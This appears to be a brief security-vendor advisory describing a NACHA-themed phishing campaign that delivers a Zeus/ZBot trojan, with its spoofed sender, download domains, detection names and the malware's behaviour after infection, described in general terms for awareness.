Since mid-2009, malware authors have used spam messages purporting to be from NACHA's ACH payment network to spread malicious software. The payload is the ZBot—also known as the Zeus botnet—infector. Over the past year and a half, the general attack has stayed the same, but the details have become more complex.
Beginning mid-March 2011, the phishing mail has been spoofed so it appears to be from payment(s)/firstname.lastname@example.org. The messages originate from a Zeus-style botnet and are indiscriminate in their targets—many copies have arrived on Sophos's spam traps. Examples of the spam messages are seen below in images 1 and 2. They are all proactively detected by the Sophos PureMessage Antispam software and Sophos Email Appliance.
In most cases, the link goes to an .info domain with "nacha" in the name (example domains in image below):
The downloaded .exe files are packed with a rogue antivirus packer but contain an advanced ZBot payload based on the now-shared Zeus botnet source code. Sophos detection names include Mal/FakeAV-EA and Troj/FakeAV-DDY.
Once run, the ZBot payload moves itself into your Application Settings and sets itself up to run on startup. It also disables Internet Explorer cookie deletion, and Access data sources across domains and Display mixed content are fully enabled and set not to prompt the user.
Next, the malware gathers your personal information from various sources on your computer, including email databases, website caches and address books.
Finally, it contacts its command-and-control server to fetch instructions for its next activities—such as sending a NACHA email, uploading gathered data, or participating in a DDoS attack—and downloads newer versions of itself and its configuration file.
Users who are vigilant not to download or execute unknown files and who do not click on unknown links will not be impacted by this threat.
That said, the fact that this campaign has remained essentially unchanged for over a year and a half implies that it has been highly successful in convincing people to click.